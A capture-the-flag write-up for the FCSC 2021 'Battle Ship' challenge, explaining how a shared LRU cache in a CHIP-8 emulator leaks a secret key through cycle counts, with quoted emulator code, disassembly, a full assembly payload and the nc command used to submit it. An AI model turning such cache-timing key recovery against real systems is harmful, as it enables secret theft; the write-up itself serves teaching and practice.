FCSC 2021 Qualification - Battle ship (misc / hardware)
FCSC 2021 Qualification - Battle Ship
This challenge was about a side channel attack on a shared cache between an untrusted and a trusted module in a chip8 emulator.
To help us understand a bit the architecture of the software we had a well detailed schema and the python source code of the emulator. It was a really nice challenge I really appreciated as the python code was a pleasure to read.
Understanding the architecture
The green part corresponds to the untrusted module and red one is trusted. We can directly execute code in the memory space of the untrusted one but not in the trusted. However we can call routine stored in the trusted.
We also had this information (in french sorry) :
L’élément sécurisé n’est rattaché à aucun périphérique. Il contient du code pré-compilé dans lequel vient s’ajouter la clé secrète précédemment générée.
Les opérations se déroulent presque toutes en 1 cycle sauf pour les opérations qui nécessitent l’utilisation de l’unité arithmétique et logique (UAL) auquel cas, 2 cycles seront nécessaires : un cycle pour soumettre le calcul à l’UAL, un cycle pour récupérer le résultat. Pour palier ce problème de performance, le constructeur a mis au point un système de cache partagé entre la VM utilisateur et l’élément sécurisé. Le cache repose sur un algorithme de type LRU et est placé en amont de l’UAL. Ainsi, si une opération a récemment été réalisée, le CPU a directement connaissance du résultat coûtant donc qu’un seul cycle.
En lien avec la gestion du cache, le constructeur a ajouté le code opération
00E1
. Cette nouvelle instruction permet de vider toutes les lignes du cache de l’UAL.Le constructeur a également implémenté deux autres codes d’opération : 0000 et 0001. Ils permettent d’interagir avec l’élément sécurisé en lui demandant de chiffrer une entrée de 10 octets avec la clé secrète ou de lui demander de vérifier si une entrée de taille 10 octet correspond à la clé secrète. Le code des deux routines est fourni. Un troisième code d’opération est implémenté :
FFFF
. Il permet de notifier la VM de la fin de l’exécution de la ROM.
When calling a routine the address space associated to the RAM is copied from the untrusted module to the trusted one and then some information are sent back through some registers I
and VF
. These are the only interactions between the two modules.
But there is also another shared thing : the LRU cache. The untrusted module can access trusted module cache value and vice versa. This way the architecture is vulnerable to a potential side channel attack on the cache.
To interact with the emulator we can simply send a custom hex encoded ROM that will be executed in the untrusted module.
Determining the goal
Thanks to the emulator source code we can identify where the flag is injected.
if msn == 0: if n == 0x0: = self.cpu.context.secure_element se se.reset() se.set_context( =self.cpu.processor.i, i =self.memory.data[self.memory.O_STACK:self.memory.SIZE] memory ) se.exc_encrypt() self.cpu.processor.v[0xF] = se.cpu.tick elif n == 0x1: = self.cpu.context.secure_element se se.reset() se.set_context( =self.cpu.processor.i, i =self.memory.data[self.memory.O_STACK:self.memory.SIZE] memory ) = se.exc_verify() flag self.cpu.processor.v[0xF] = se.cpu.processor.v[0xF] if self.cpu.processor.v[0xF] == 0: if self.cpu.processor.i+10+len(flag) > self.memory.SIZE: raise MemoryError("Not enought memory space") self.memory.data[self.cpu.processor.i+10:self.cpu.processor.i+10+len(flag)] = flag
As noticed in the challenge information, when the execution returns from the trusted module it copies the VF
and I
registers to the untrusted registers. Following the se.exc_verify
we see that if the VF
register is equal to 0
the flag will be loaded in the untrusted memory making it accessible for us.
We have now to understand how VF
can be zero at the end of the function.
class TrustedContext(BaseContext): def __init__(self): super().__init__() self.execution_key = os.urandom(10) self.co_encrypt = routines.preco_encrypt.format(*self.execution_key) self.co_verify = routines.preco_verify.format(*self.execution_key) def set_context(self, i=None, memory=None): if i: self.cpu.processor.i = i if memory: assert len(memory) == Memory.SIZE - Memory.O_STACK self.memory.data[Memory.O_STACK:Memory.SIZE] = memory def exc_encrypt(self): self.load(self.co_encrypt) self.run() def exc_verify(self): self.load(self.co_verify) self.run() return flag.FLAG_LV2
We see in the above code that exc_verify
load a pre-compiled routine named co_verify
and pass it 10 random bytes. Lets disassemble this routine.
For the disassembly I simply used https://github.com/mwales/chip8 which do a great work :
0x0200 ld v1, #01 0x0202 ld v2, #00 0x0204 ld v0, [I] 0x0206 ld v3, #71 0x0208 xor v3, v0 0x020a or v2, v3 0x020c add I, v1 0x020e ld v0, [I] 0x0210 ld v3, #43 0x0212 xor v3, v0 0x0214 or v2, v3 0x0216 add I, v1 0x0218 ld v0, [I] 0x021a ld v3, #7c 0x021c xor v3, v0 0x021e or v2, v3 0x0220 add I, v1 0x0222 ld v0, [I] 0x0224 ld v3, #8e 0x0226 xor v3, v0 0x0228 or v2, v3 0x022a add I, v1 0x022c ld v0, [I] 0x022e ld v3, #d6 0x0230 xor v3, v0 0x0232 or v2, v3 0x0234 add I, v1 0x0236 ld v0, [I] 0x0238 ld v3, #af 0x023a xor v3, v0 0x023c or v2, v3 0x023e add I, v1 0x0240 ld v0, [I] 0x0242 ld v3, #60 0x0244 xor v3, v0 0x0246 or v2, v3 0x0248 add I, v1 0x024a ld v0, [I] 0x024c ld v3, #11 0x024e xor v3, v0 0x0250 or v2, v3 0x0252 add I, v1 0x0254 ld v0, [I] 0x0256 ld v3, #d6 0x0258 xor v3, v0 0x025a or v2, v3 0x025c add I, v1 0x025e ld v0, [I] 0x0260 ld v3, #10 0x0262 xor v3, v0 0x0264 or v2, v3 0x0266 add I, v1 0x0268 ld vf, v2 0x026a BAD OPCODE 0xffff
The code is constituted of 10 patterns which do the same thing. It loads a value from the I
register add 1 to this address, deference a byte and xor this byte with one of the random 10 bytes and finally stores the result in V2
.
To resume it, xor a string provided through the I register with 10 random bytes and store the result in V2
before placing it in VF
. So VF
will be 0
only if we provided the same 10 characters as the random one.
However it’s impossible to guess this 10 bytes.
The shared cache vulnerability
Lucky us, there is another routine we can access trough the 0x00e0
instruction. This routine will simply xor the provided string against the same 10 random bytes and will return the number of CPU cycle executed trough the VF
register.
As the 10 random bytes are used to xor
our input are the same we need to guess we could simply send 10 null bytes in order to leak it. However the result of this encryption resides in the trusted module ram we can’t read.
But there is something really important :
Les opérations se déroulent presque toutes en 1 cycle sauf pour les opérations qui nécessitent l’utilisation de l’unité arithmétique et logique (UAL) auquel cas, 2 cycles seront nécessaires : un cycle pour soumettre le calcul à l’UAL, un cycle pour récupérer le résultat.
If the UAL operation is already in the CPU cache it will only do 1 cycle instead of 2.
Thats means we can know if an operation with it’s 2 operand has already been executed by looking at the number of cycle returned.
After some tests I noticed the encrypt
routine will need 61
cycles to be executed. If the routine is executed with less than 61
it means that a xor with the two operands already have be done before.
Test case
For example lets take 0x41
as the first random byte.
Executing 1 ^ 2
in untrusted memory will store this instruction in the cache and will do 2 cycles.
The next time doing 1 ^ 2
the cache would directly send back 3
in one cycle.
If I did 1 ^ 0x41
it will store the operation in the cache. Now if I call the xor encryption routine it will also do 1 ^ 0x41
as 0x41
is the first random byte. The value will be cached as I already have done this instruction just before and so the routine will do 1 cycle less. At the end of the execution VF
will hold 60
instead of 61
.
To resume if the encrypt routine do an instruction we have already done just before we will able to know which value have been used.
Payload analysis
I used the following project to write CHIP8 asm https://github.com/wernsey/chip8. The code is splited in several steps.
start: CLS , 0 ; counter for 10 bytes key LD VE go: , 0 ; char to test LD V5 loop: V0, #13 ; we gonna set char_to_test ^ #13 in the cache right now LD V1, V5 LD xor V0, V1 V1, 1 LD , #EA0 ; start of our buffer in ram LD I ADD I, VE ; index we test right now V0, #13 ; we gonna set #13 too LD [I], V0 ; ; we set in the ram #13 at the offset of the char of the key we want to test LD , #EA0 ; we pass our buffer to the call to encrypt LD I 0 SYS , 60 ; vf hold the cpu cycle count, if there are only cache miss its 61 SNE VF ; but if we already did an operation with the same value #13 ^ V5 (char we test) ; there will be a cache it and the cpu will have only one cycle instead of 2 ; and so VF is 60 JP cont ; if VF is not 60 we test another char ADD V5, 1 dw #00e1 ; but first we clean the AL cache JP loop cont: ; we found a key , #EC0 ; we prepare the buffer for the verify call LD I ADD I, VE ; which offset we found V0, V5 ; the value found LD [I], V0 ; set it LD , #EA0 ; reset modified byte else the cache hit value will be erroned LD I ADD I, VE V0, 0 LD [I], V0 LD ADD VE, 1 ; increment to reach 10 bytes , 10 SNE VE JP then JP go
This code will simply do a xor between 0x13
and value from 0
to 0xff
after each xor it calls the routine with 0x13
at the right offset thanks to SYS 0
. If VF
is equal to 60
we have found the right value and can now set the value in another buffer which will be sent to the second routine for verification.
Everything is in a loop and between two calls to the routine we simply flush the UAL cache to reset the initial number of CPU cycle needed.
Once we found the 10 keys we can prepare the call to the second routine
then: ; we found all the bytes , #EC0 ; our buffer with the bruteforced char LD I 1 ; calling the verify routine which will add the flag in RAM SYS
If everything made it until here, the flag should resides in the memory right after our buffer. The remain of the payload is only used to display the flag and add some sleep function as the delay wasn’t implemented in the emulator.
, 0 ; counter for displaying the flag LD VE final: , #EC5 ; EC0 + 10 ?? should be eca LD I ADD I, VE , [I] ; we fetch the byte LD V5 dis_one: ; to mark the transition between 2 digit CLS , 1 ; SET x LD V3 , 1 ; SET Y LD V4 , 0 LD V6 , 15 ; 1111 LD V7 , V5 LD V8 , V5 LD V9 SHR V8, V6 ; fetch the 4 msb to the lsb SHR V8, V6 SHR V8, V6 SHR V8, V6 AND V8, V7 ; keep only the 4 lsb now AND V9, V7 ; second part of the byte, 4 lsb V1, 1 ; sprite to use LD , V8 ; set I with the selected sprite LD F , V4, 5 ; display sprite to the coordinate and size DRW V3 letssleep: ; sleep as DT was not implemented to be able to see the char on screen , 0 LD VB sleep0: , 0 LD VA ADD VB, 1 sleep: ADD VA, 1 , #ff SE VA JP sleep , #60 SE VB JP sleep0 CLS V1, 1 ; sprite to use LD , V9 ; set I with the selected sprite LD F , V4, 5 ; display sprite to the coordinate and size DRW V3 letssleep2: , 0 LD VB sleep2: , 0 LD VA ADD VB, 1 sleep1: ADD VA, 1 , #ff SE VA JP sleep1 , #80 SE VB JP sleep2 CLS ADD VE, 1 ; increment JP final
As we can’t display a byte I splited it into 2 parts composed of 4 bits each. I used the SHR
instruction to rotate the bytes to reach the least significant bit position and then I could use the DRW
instruction to display a sprite. Then I take the saved real 4 least significant bits to display another sprite finally. So I have to used 2 sprites to display one byte.
I did some loop to create a delay in order to have time between each hexadecimal characters displayed on the screen. As mentioned in the documentation there is no keyboard handled by the emulator and so and make the program hang until I press a key.
Executing the payload
To compile and run the payload I used the following command
c8asm payload.asm && cat a.ch8 | (xxd -p -l 2000 -c 20000 | tr -d "\n" ; echo "ffff") | nc challenges1.france-cybersecurity-challenge.fr 7004
Then I could contemplate the hex characters displayed one by one on my screen :
I didn’t really talk about chip8 architecture as it’s for me more the purpose of the first challenge. But I found a lot of very well detailed documentation and a lot of projects.
Sources
https://en.wikipedia.org/wiki/CHIP-8#Virtual_machine_description
https://github.com/wernsey/chip8
http://devernay.free.fr/hacks/chip8/C8TECH10.HTM#Dxyn
https://github.com/mattmikolay/chip-8/wiki/Mastering-CHIP%E2%80%908
https://github.com/mwales/chip8/blob/master/customRom/helloworld.md
https://github.com/mwales/chip8